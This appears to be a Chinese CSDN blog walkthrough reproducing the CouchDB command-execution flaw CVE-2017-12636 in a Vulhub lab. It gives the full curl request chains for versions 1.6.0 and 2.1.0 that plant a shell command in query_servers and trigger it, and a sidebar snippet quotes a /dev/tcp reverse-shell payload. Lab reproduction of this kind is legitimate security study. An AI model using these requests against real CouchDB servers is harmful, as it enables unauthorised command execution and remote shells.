利用Vulnhub复现漏洞 - Couchdb 任意命令执行漏洞(CVE-2017-12636)

最新推荐文章于 2024-08-03 16:14:20 发布
最新推荐文章于 2024-08-03 16:14:20 发布
阅读量1k 收藏
点赞数
分类专栏: 渗透 文章标签: Vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JiangBuLiu/article/details/94029940
版权

Couchdb 任意命令执行漏洞(CVE-2017-12636)

Vulnhub官方复现教程

https://vulhub.org/#/environments/couchdb/CVE-2017-12636/

漏洞原理

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。

影响版本:小于 1.7.0 以及 小于 2.1.1

参考链接:

复现漏洞

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056

进入路径为

cd /root/vulhub/couchdb/CVE-2017-12636

搭建及运行漏洞环境:

docker-compose build && docker-compose up -d

启动完成后,访问http://your-ip:5984/即可看到Couchdb的欢迎页面。
在这里插入图片描述
在这里插入图片描述
注意看下版本

漏洞复现

该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先【增加一个管理员用户】。
同样,记得在Burp的拦截端口添加一个5984

1.6.0 下的说明

如果没有进行
依次执行如下请求即可触发任意命令执行:

curl -X PUT 'http://vulhub:vulhub@your-ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://vulhub:vulhub@your-ip:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

其中,vulhub:vulhub为管理员账号密码。

第一个请求是添加一个名字为cmdquery_servers,其值为"id >/tmp/success",这就是我们后面待执行的命令。

第二、三个请求是添加一个Database和Document,这里添加了后面才能查询。

第四个请求就是在这个Database里进行查询,因为我将language设置为cmd,这里就会用到我第一步里添加的名为cmdquery_servers,最后触发命令执行。

2.1.0 下的说明

2.1.0中修改了1.6.0用到的两个API,这里需要详细说明一下。

Couchdb 2.x 引入了集群,所以修改配置的API需要增加node name。这个其实也简单,我们带上账号密码访问/_membership即可:

curl http://vulhub:vulhub@your-ip:5984/_membership

攻击机是Windows我不知道怎么发送上面这命令,我用Kali直接传了在这里插入图片描述
可见,我们这里只有一个node,名字是nonode@nohost

然后,我们修改nonode@nohost的配置:

curl -X PUT http://vulhub:vulhub@your-ip:5984/_node/nonode@nohost/_config/query_servers/cmd -d '"id >/tmp/CVE-2017-12636_is_success"'

[外链图片转存失败(img-QVYZPAsR-1562319462379)(https://vulhub.org/vulhub/couchdb/CVE-2017-12636/2.png)]
在这里插入图片描述
可进入容器,或者通过locate命令查看是否成功
在这里插入图片描述
然后,与1.6.0的利用方式相同,我们先增加一个Database和一个Document:

curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'

在这里插入图片描述

curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'

在这里插入图片描述
Couchdb 2.x删除了_temp_view,所以我们为了触发query_servers中定义的命令,需要添加一个_view

curl -X PUT http://vulhub:vulhub@your-ip:5984/vultest/_design/vul -d '{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"

增加_view的同时即触发了query_servers中的命令。

我这一步出了问题?
在这里插入图片描述

利用脚本

写了一个简单的脚本 exp.py,修改其中的target和command为你的测试机器,然后修改version为对应的Couchdb版本(1或2),成功反弹shell:

建瓯最坏
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Couchdb 任意命令执行漏洞CVE-2017-12636复现
玄道的网安博客
05-06 3455
简介 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 影响版本 小于 1.7.0 以及 小于 2.1.1 环境搭建 https://githu...
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 382
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
CouchDB 未授权访问漏洞总结
qq_45746681的博客
10-05 1197
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、CouchDB 未授权访问漏洞是什么?二、复现1.搭建环境2.漏洞反弹shell的exp防御方法 前言 复现常见的未授权访问漏洞 加强理解 一、CouchDB 未授权访问漏洞是什么? Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其
Adobe ColdFusion反序列化漏洞(cve-2017-3066)
最新发布
山兔的博客
08-03 531
Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。
Couchdb 任意命令执行漏洞CVE-2017-12636
EC_Carrot的博客
05-24 379
漏洞背景 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令
couchdb 任意命令执行漏洞 cve-2017-12636
whatday的专栏
01-30 325
Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 漏洞简介: CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Obj
Apache couchdb 命令执行CVE-2017-12636复现
YouthBelief的博客
11-04 800
couchdb 命令执行CVE-2017-12636couchdb 命令执行CVE-2017-12636)0x01 漏洞描述0x02 影响范围0x03 漏洞复现工具复现0x04 漏洞修复 couchdb 命令执行CVE-2017-12636) Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展
Couchdb 垂直权限绕过漏洞CVE-2017-12635)
一枚不知名的Java程序猿
10-02 971
vulhub漏洞复现学习过程
CVE-2017-12635+12636 复现+反弹shell
weixin_45695535的博客
05-08 1477
整体过程漏洞描述一、复现过程环境复现cve-2017-12636反弹shellpython3 exp 反弹shell参考文章 漏洞描述 Apache CouchDB 是一个开源数据库,专注于易用性和成为” 完全拥抱 web 的数据库”。它是一个使用 JSON 作为存储格式,JavaScript 作为查询语言,MapReduce 和 HTTP 作为 API 的 NoSQL 数据库。应用广泛,如 BBC 用在其动态内容展示平台,Credit Suisse 用在其内部的商品部门的市场框架,Meebo,用在其社交
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2017-12636
易编橙 · 终身成长社群,相遇已是上上签!
10-22 726
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞
Couchdb_任意命令执行漏洞 CVE-2017-12636 漏洞复现
ADummy的博客
02-22 343
Couchdb 垂直权限绕过漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>用户创建成功—>成功登录 0x01漏洞介绍 CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。CouchDB会默认会在5984端口开放Restful的API接口,用于数据库的管理功能。 那么,问题出在哪呢?翻阅官方描述会发现,CouchDB中有一个Query_Server的配置
Couchdb数据库-命令执行漏洞复现-CVE-2017-12636
apple_52661176的博客
08-31 221
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。0>&1""" #攻击机ip。开启vulfocus靶场环境。在攻击机上开启nc监听。
CouchDB任意命令执行CVE-2017-12636
Kevin's Blog
07-26 996
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 攻击过程五、防御措施 一、漏洞原理   CountDB通过RESTful JavaScript Object Notation (JSON) API访问,CouchDB默认在5984开放Restful的API接口,用于数据库管理。由于CouchDB允许用户指定一个二进制程序或脚本,于Cou...
Couchdb 任意命令执行漏洞(CVE-2017-12636)
weixin_46239998的博客
01-01 783
command = rb"""sh -i >& /dev/tcp/192.168.217.128/5566 0>&1""" # 这里的ip为监听机ip也就是攻击机。target = 'http://192.168.217.128:5984' # 目标ip。如上图所示即反弹shell成功!三、构造payload。
Apache CouchDB信息泄露漏洞CVE-2023-26268深度解析及解决方案
"Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告,涉及Apache CouchDB 3.3.x和3.2.x版本,需要升级至安全版本或使用深信服解决方案进行资产检测和漏洞检测。" Apache CouchDB是一款开源的NoSQL文档数据库系统,它...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值